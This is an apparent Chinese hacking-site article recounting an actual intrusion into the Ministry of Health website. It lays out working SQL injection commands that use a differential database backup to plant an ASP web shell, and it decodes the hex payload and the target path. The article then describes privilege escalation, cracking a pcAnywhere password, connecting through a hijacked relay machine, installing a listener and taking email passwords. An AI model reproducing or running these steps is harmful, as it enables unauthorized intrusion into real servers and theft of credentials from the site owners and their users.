网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > 入侵实例 > 20分钟搞定华人民共和国卫生部网站(推荐)(图)  

20分钟搞定华人民共和国卫生部网站(推荐)(图)

2005-07-05  作者:BitsCN整理  来源:中国网管联盟  点评 投稿 收藏

上了hao123,随便点了饿一下,发现是个大站,中华人民共和国卫生部网站,挺大
是asp.net做的,照搞不误,
提交单引号出错,凭经验判断可以注入。

开工,发现是dbo权限,有点低哦!后太有ip限制,403错误。
就差异备份下小木马。着个比较简单哦,
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s

create table [dbo].[xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a")%>
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp 网管联盟bitsCN@com

着里的路径我们用nbsi列目录就ok了!

好想小路这家伙写了个小工具,跟简单好用! 

 
进了,提升权限,发现了pcanywhere,用个小根据破下密码。
我没装pcanywhere,就上我的一只台湾肉鸡,连上去了。
看时间,也就20来分钟吧!
装了个监听器,有两个油箱密码,没什么好玩的,肉鸡多了不好!
在他们主页上提醒下管理员,在他桌面上留防注入的代码。
结束,闪人。
本来想写详细点,为菜鸟写篇经典文章, 

TAGs   网站   推荐   卫生部   共和   搞定   人民   分钟   @s   @a   发现   nvarchar      
 上一篇:教育网站遭遇的三次入侵实例剖析   下一篇:动网论坛7.0 SQL版从前台到后拿到shell利用全过程(图)
20分钟搞定华人民共和国卫生部网站(推荐)(图) 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: